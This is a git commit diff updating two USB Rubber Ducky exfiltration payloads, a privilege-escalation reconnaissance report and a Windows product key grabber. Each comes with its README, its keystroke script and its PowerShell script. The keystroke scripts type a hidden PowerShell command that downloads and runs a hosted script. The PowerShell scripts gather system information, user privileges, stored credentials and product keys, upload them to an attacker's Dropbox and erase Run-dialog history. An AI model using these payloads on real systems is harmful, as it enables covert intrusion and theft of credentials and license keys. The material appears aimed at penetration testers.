Small updates

pull/431/head
Julien M 2024-06-02 13:25:50 +02:00
parent ea737c4c6d
commit 3da90fee4d
6 changed files with 230 additions and 228 deletions

View File

@ -2,10 +2,13 @@
<p> <p>
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt"> <a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt">
<img alt="View on: Payload Studio" src="https://img.shields.io/badge/View_on-Payload_Studio-red?style=flat-square"> <img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
</a> </a>
<a href="#"> <a href="#">
<img alt="Target: Windows 10, 11" src="https://img.shields.io/badge/Target-Windows_10,_11-blue?style=flat-square"> <img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
</a>
<a href="#">
<img alt="VERSION: 1.3" src="https://img.shields.io/badge/VERSION-1.3-green?style=for-the-badge">
</a> </a>
</p> </p>
@ -16,10 +19,9 @@ This payload sends you a brief user privilege escalation report via Dropbox. Onc
|System Information|[WES-NG](https://github.com/bitsadmin/wesng)| |System Information|[WES-NG](https://github.com/bitsadmin/wesng)|
|User Information|[Priv2Admin](https://github.com/gtworek/Priv2Admin)| |User Information|[Priv2Admin](https://github.com/gtworek/Priv2Admin)|
|Stored Credentials|| |Stored Credentials||
|Installed Programs|[Exploit Database](https://www.exploit-db.com) & [Packet Storm](https://packetstormsecurity.com)| |Installed Programs|[Exploit Database](https://www.exploit-db.com/) & [Packet Storm](https://packetstormsecurity.com/)|
<details> ## Process
<summary>Extension operation</summary>
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows. 1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
2. Opens a Windows Run dialog box. 2. Opens a Windows Run dialog box.
@ -28,14 +30,12 @@ This payload sends you a brief user privilege escalation report via Dropbox. Onc
- Prepares a report on target PC user privilege escalation. - Prepares a report on target PC user privilege escalation.
- Sends the report to a file in your Dropbox. - Sends the report to a file in your Dropbox.
</details>
## Prerequisites ## Prerequisites
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox). First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://codeberg.org/PlumpyTurkey/Ducky-Utilities/src/branch/main/PowerShell-Functions/Send-ToDropbox). Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
> Note: If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0". > [!WARNING]
> If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
## Options ## Options
@ -45,4 +45,4 @@ Once you get them, you need to download the "script.ps1" file for this payload a
## Contributors ## Contributors
- [@PlumpyTurkey](https://github.com/PlumpyTurkey) - [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)

View File

@ -89,6 +89,7 @@ EXTENSION RUN_HOSTED_POWERSHELL
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
GUI r GUI r
DELAY #RHP_DELAY DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX" STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"

View File

@ -3,34 +3,33 @@ $APP_KEY = "XXXXXXXXXXXXXXX"
$APP_SECRET = "XXXXXXXXXXXXXXX" $APP_SECRET = "XXXXXXXXXXXXXXX"
function Send-ToDropbox { function Send-ToDropbox {
#Documentation: https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox
[CmdletBinding()] [CmdletBinding()]
param( param(
[Parameter(Mandatory = $true)]
[string]$Content,
[Parameter(Mandatory = $true)] [Parameter(Mandatory = $true)]
[string]$RefreshToken, [string]$RefreshToken,
[Parameter(Mandatory = $true)] [Parameter(Mandatory = $true)]
[string]$AppKey, [string]$AppKey,
[Parameter(Mandatory = $true)] [Parameter(Mandatory = $true)]
[string]$AppSecret, [string]$AppSecret,
[Parameter(Mandatory = $true)]
[string]$Content,
[string]$OutputFolder = "Exfiltrated-content", [string]$OutputFolder = "Exfiltrated-content",
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt" [string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
) )
try { try {
$AccessToken = (Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{ Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
"Authorization" = "Bearer $((
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
"Content-Type" = "application/x-www-form-urlencoded" "Content-Type" = "application/x-www-form-urlencoded"
} -Body @{ } -Body @{
"grant_type" = "refresh_token" "grant_type" = "refresh_token";
"refresh_token" = $RefreshToken "refresh_token" = $RefreshToken;
"client_id" = $AppKey "client_id" = $AppKey;
"client_secret" = $AppSecret "client_secret" = $AppSecret
}).access_token }
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{ ).access_token)";
"Authorization" = "Bearer $AccessToken" "Content-Type" = "application/octet-stream";
"Content-Type" = "application/octet-stream"
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}" "Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
} -Body $Content | Out-Null } -Body $Content | Out-Null
} }
@ -39,6 +38,7 @@ function Send-ToDropbox {
} }
} }
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
$Report = "*** System Information ***`n $(SYSTEMINFO | Out-String)`n" $Report = "*** System Information ***`n $(SYSTEMINFO | Out-String)`n"
@ -46,4 +46,4 @@ $Report += "*** User Information ***`n $(WHOAMI /ALL | Out-String)`n"
$Report += "*** Stored Credentials ***`n $(CMDKEY /LIST | Out-String)`n" $Report += "*** Stored Credentials ***`n $(CMDKEY /LIST | Out-String)`n"
$Report += "*** Installed Programs ***`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" $Report += "*** Installed Programs ***`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
Send-ToDropbox -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET -Content $Report Send-ToDropbox -Content $Report -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET

View File

@ -2,17 +2,19 @@
<p> <p>
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Product-Key-Grabber/payload.txt"> <a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Product-Key-Grabber/payload.txt">
<img alt="View on: Payload Studio" src="https://img.shields.io/badge/View_on-Payload_Studio-red?style=flat-square"> <img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
</a> </a>
<a href="#"> <a href="#">
<img alt="Target: Windows 10, 11" src="https://img.shields.io/badge/Target-Windows_10,_11-blue?style=flat-square"> <img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
</a>
<a href="#">
<img alt="VERSION: 1.0" src="https://img.shields.io/badge/VERSION-1.0-green?style=for-the-badge">
</a> </a>
</p> </p>
This payload sends you the target PC's Windows product key via Dropbox. This payload sends you the target PC's Windows product key via Dropbox.
<details> ## Process
<summary>Extension operation</summary>
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows. 1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
2. Opens a Windows Run dialog box. 2. Opens a Windows Run dialog box.
@ -21,14 +23,12 @@ This payload sends you the target PC's Windows product key via Dropbox.
- Recovers Windows product key from target PC. - Recovers Windows product key from target PC.
- Sends the Windows product key of the target PC to a file in your Dropbox. - Sends the Windows product key of the target PC to a file in your Dropbox.
</details>
## Prerequisites ## Prerequisites
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox). First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://codeberg.org/PlumpyTurkey/Ducky-Utilities/src/branch/main/PowerShell-Functions/Send-ToDropbox). Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
> Note: If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0". > [!WARNING]
> If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
## Options ## Options
@ -38,4 +38,4 @@ Once you get them, you need to download the "script.ps1" file for this payload a
## Contributors ## Contributors
- [@PlumpyTurkey](https://github.com/PlumpyTurkey) - [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)

View File

@ -89,6 +89,7 @@ EXTENSION RUN_HOSTED_POWERSHELL
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
GUI r GUI r
DELAY #RHP_DELAY DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX" STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"

View File

@ -3,34 +3,33 @@ $APP_KEY = "XXXXXXXXXXXXXXX"
$APP_SECRET = "XXXXXXXXXXXXXXX" $APP_SECRET = "XXXXXXXXXXXXXXX"
function Send-ToDropbox { function Send-ToDropbox {
#Documentation: https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox
[CmdletBinding()] [CmdletBinding()]
param( param(
[Parameter(Mandatory = $true)]
[string]$Content,
[Parameter(Mandatory = $true)] [Parameter(Mandatory = $true)]
[string]$RefreshToken, [string]$RefreshToken,
[Parameter(Mandatory = $true)] [Parameter(Mandatory = $true)]
[string]$AppKey, [string]$AppKey,
[Parameter(Mandatory = $true)] [Parameter(Mandatory = $true)]
[string]$AppSecret, [string]$AppSecret,
[Parameter(Mandatory = $true)]
[string]$Content,
[string]$OutputFolder = "Exfiltrated-content", [string]$OutputFolder = "Exfiltrated-content",
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt" [string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
) )
try { try {
$AccessToken = (Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{ Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
"Authorization" = "Bearer $((
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
"Content-Type" = "application/x-www-form-urlencoded" "Content-Type" = "application/x-www-form-urlencoded"
} -Body @{ } -Body @{
"grant_type" = "refresh_token" "grant_type" = "refresh_token";
"refresh_token" = $RefreshToken "refresh_token" = $RefreshToken;
"client_id" = $AppKey "client_id" = $AppKey;
"client_secret" = $AppSecret "client_secret" = $AppSecret
}).access_token }
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{ ).access_token)";
"Authorization" = "Bearer $AccessToken" "Content-Type" = "application/octet-stream";
"Content-Type" = "application/octet-stream"
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}" "Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
} -Body $Content | Out-Null } -Body $Content | Out-Null
} }
@ -39,9 +38,10 @@ function Send-ToDropbox {
} }
} }
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
$ProductKey = "Original Product Key: $((Get-WmiObject -Query 'select * from SoftwareLicensingService').OA3xOriginalProductKey | Out-String)`n" $ProductKey = "Original Product Key: $((Get-WmiObject -Query 'select * from SoftwareLicensingService').OA3xOriginalProductKey | Out-String)`n"
$ProductKey += "Backup Product Key: $((Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform').BackupProductKeyDefault | Out-String)" $ProductKey += "Backup Product Key: $((Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform').BackupProductKeyDefault | Out-String)"
Send-ToDropbox -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET -Content $ProductKey Send-ToDropbox -Content $ProductKey -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET